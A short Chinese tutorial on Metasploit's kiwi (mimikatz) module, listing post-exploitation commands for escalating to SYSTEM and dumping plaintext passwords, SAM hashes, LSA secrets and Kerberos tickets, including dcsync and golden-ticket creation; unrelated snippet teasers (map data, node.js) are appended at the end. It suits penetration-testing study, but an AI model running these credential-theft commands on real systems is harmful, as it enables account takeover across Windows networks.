使用kiwi模組需要system許可權,所以我們在使用該模組之前需要將當前msf中的shell提公升為system。提到system有兩個方法,一是當前的許可權是administrator使用者,二是利用其它手段先提權到administrator使用者。然後administrator使用者可以直接getsystem到system許可權。
提權到system許可權
程序遷移
載入kiwi模組
load kiwicreds_all:列舉所有憑據
creds_kerberos:列舉所有kerberos憑據
creds_msv:列舉所有msv憑據
creds_ssp:列舉所有ssp憑據
creds_tspkg:列舉所有tspkg憑據
creds_wdigest:列舉所有wdigest憑據
dcsync:通過dcsync檢索使用者帳戶資訊
dcsync_ntlm:通過dcsync檢索使用者帳戶ntlm雜湊、sid和rid
golden_ticket_create:建立**票據
kerberos_ticket_list:列舉kerberos票據
kerberos_ticket_purge:清除kerberos票據
kerberos_ticket_use:使用kerberos票據
kiwi_cmd:執行mimikatz的命令,後面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的sam
lsa_dump_secrets:dump出lsa的密文
password_change:修改密碼
wifi_list:列出當前使用者的wifi配置檔案
wifi_list_shared:列出共享wifi配置檔案/編碼
creds_all
#該命令可以列舉系統中的明文密碼
kiwi_cmd
kiwi_cmd 模組可以讓我們使用mimikatz的全部功能,該命令後面接 mimikatz.exe 的命令
kiwi_cmd sekurlsa::logonpasswords
MSF中mimikatz模組的使用
msf中mimikatz模組的使用 目錄 mimikatz模組的載入 mimikatz command模組的用法 列出hash 明文密碼 kerberos模組 livessp模組 msv模組 列出密碼雜湊 ssp模組 tspkg模組 wdigest模組 mimikatz模組的使用需要administ...
由KIWI資料規格想到國人使用導航的誤導
最近在內部討論到資料和功能的一些問題,今天突然想到kiwi資料規格的好,並由此感覺在國內對導航的使用存在誤導,包括開發者和消費者,當然這也是不可扭轉的現狀,消費教育 消費引導都不是隨便就能改變的。說兩件事情吧。1 關於動態標註和靜態標註的問題。雖然這是地圖表現層的技術實現,和kiwi資料沒有關係,但...
node 中的模組使用
node由三部分組成 ecmascript 核心模組 第三方模組 核心模組 第三方模組 使用require匯入這個第三方模組!通過官方文件,試著去使用這個第三方模組!注意 無論是核心模組 還是第三方模組,都是通過 require來引用這個模組的!乙個簡單的第三方模組使用的案例 1 這個檔案演示一下如...